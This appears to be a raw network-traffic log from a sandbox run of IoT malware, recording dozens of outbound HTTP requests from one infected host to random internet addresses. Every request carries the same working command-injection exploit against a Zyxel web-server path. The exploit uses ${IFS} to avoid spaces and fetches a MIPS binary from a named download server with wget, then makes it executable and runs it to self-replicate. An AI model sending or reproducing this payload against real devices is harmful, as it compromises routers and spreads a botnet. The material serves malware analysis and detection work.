                                    Jan 13, 2024 19:02:52.610042095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9075192.168.2.1353570122.173.29.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610096931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9076192.168.2.134186078.96.105.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610152006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9077192.168.2.1334236196.124.58.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610213995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9078192.168.2.13592842.53.154.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610266924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9079192.168.2.1345582192.180.15.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610301971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9080192.168.2.1359926133.72.64.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610352039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9081192.168.2.133915069.76.171.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610404015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9082192.168.2.1342290102.23.135.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610454082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9083192.168.2.136031889.78.53.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610488892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9084192.168.2.1334516114.101.115.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610560894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9085192.168.2.1335244171.224.39.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610604048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9086192.168.2.1343788161.171.233.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610672951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9087192.168.2.1333570153.51.155.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610704899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9088192.168.2.136057266.13.238.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610739946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9089192.168.2.1334134162.147.173.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610799074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9090192.168.2.1338196118.190.172.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610836029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9091192.168.2.1337040113.234.189.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610872984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9092192.168.2.1355922103.105.199.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.610970020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9093192.168.2.1352168121.104.134.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611028910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9094192.168.2.133339436.88.247.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611042023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9095192.168.2.1342704135.168.201.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611110926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9096192.168.2.1347156198.209.138.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611144066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9097192.168.2.135297893.122.75.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611217022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9098192.168.2.1336226182.213.28.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611274958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9099192.168.2.1357290166.161.64.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611339092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9100192.168.2.135072282.62.254.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611387014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9101192.168.2.1353040202.235.102.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611450911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9102192.168.2.135143273.170.39.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611504078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9103192.168.2.1346432204.25.233.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611576080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9104192.168.2.133621657.101.145.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611629963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9105192.168.2.133365234.205.37.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611668110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9106192.168.2.1358872110.72.219.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611717939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9107192.168.2.135177240.109.158.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611778021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9108192.168.2.1354766135.2.66.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611820936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9109192.168.2.135934473.34.182.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611869097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9110192.168.2.1349168155.7.210.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611912012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9111192.168.2.133798469.76.12.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.611994982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9112192.168.2.133870225.98.211.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612044096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9113192.168.2.1339208192.72.133.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612114906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9114192.168.2.1352210149.45.123.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612169027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9115192.168.2.1348372118.23.248.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612215996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9116192.168.2.1342010186.159.156.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612253904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9117192.168.2.1349462208.117.195.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612317085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9118192.168.2.1350160135.57.33.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612381935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9119192.168.2.1350872166.61.180.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612449884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9120192.168.2.135871231.157.251.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612504959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9121192.168.2.134017688.180.210.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612560034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9122192.168.2.1344220139.222.7.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612628937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9123192.168.2.135623676.169.197.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612690926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9124192.168.2.1334198120.220.185.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612744093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9125192.168.2.1357374196.220.113.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612806082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9126192.168.2.133571065.246.66.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612867117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9127192.168.2.135726466.15.126.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612924099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9128192.168.2.134269840.30.79.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.612967014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9129192.168.2.1341704115.156.119.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613025904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9130192.168.2.1339054115.139.32.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613080025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9131192.168.2.1345278111.237.138.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613154888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9132192.168.2.13486329.17.79.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613209963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9133192.168.2.1359236204.170.84.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613266945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9134192.168.2.1354804144.78.107.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613327026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9135192.168.2.1356594180.211.241.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613384962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9136192.168.2.133552035.35.16.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613404989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9137192.168.2.135994081.235.235.201443
                                    TimestampBytes transferredDirectionData
